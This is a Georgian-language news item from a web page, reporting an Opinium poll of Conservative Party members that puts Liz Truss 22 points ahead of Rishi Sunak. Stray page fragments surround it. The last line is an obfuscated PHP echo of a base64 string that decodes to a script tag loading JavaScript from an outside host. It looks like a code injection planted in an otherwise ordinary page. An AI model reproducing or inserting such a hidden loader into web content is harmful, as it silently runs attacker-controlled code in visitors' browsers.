celsiusi
ავერსი საქკაბელი
​კონსერვატიულ პარტიაში ჩატარებული გამოკითხვებით, ბრიტანეთის პრემიერ-მინისტრის პოსტის დასაკავებლად ლიზ ტრასი 22 პროცენტით უსწრებს რიში სუნაკს. ინფორმაციას ამის შესახებ სააგენტო „როიტერი“ ავრცელებს.
 
როგორც „როიტერი“ წერს, გამოკითხვა კონსერვატიულ პარტიაში სააგენტო „ოპინიუმმა” ჩაატარა.
 
პარტიის 450 წევრს შორის ჩატარებული გამოკითხვების მიხედვით, გამოკითხულთა 61 პროცენტი სწორედ ბრიტანეთის საგარეო საქმეთა მინისტრს უჭერს მხარს პრემიერ-მინისტრის პოსტის დაკავების მხრივ, ხოლო ხაზინის ყოფილ კანცლერს, რიში სუნაკს მხოლოდ 39 პროცენტი.
 
ახალი პრემიერ-მინისტრის ვინაობა 5 სექტემბერს გახდება ცნობილი. 22 ივლისიდან პარტიის ახალი ლიდერის არჩევაში დიდი ბრიტანეთის კონსერვატიული პარტიის წევრები მთელი ქვეყნიდან ფოსტის საშუალებით მიიღებენ მონაწილეობას.
567
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");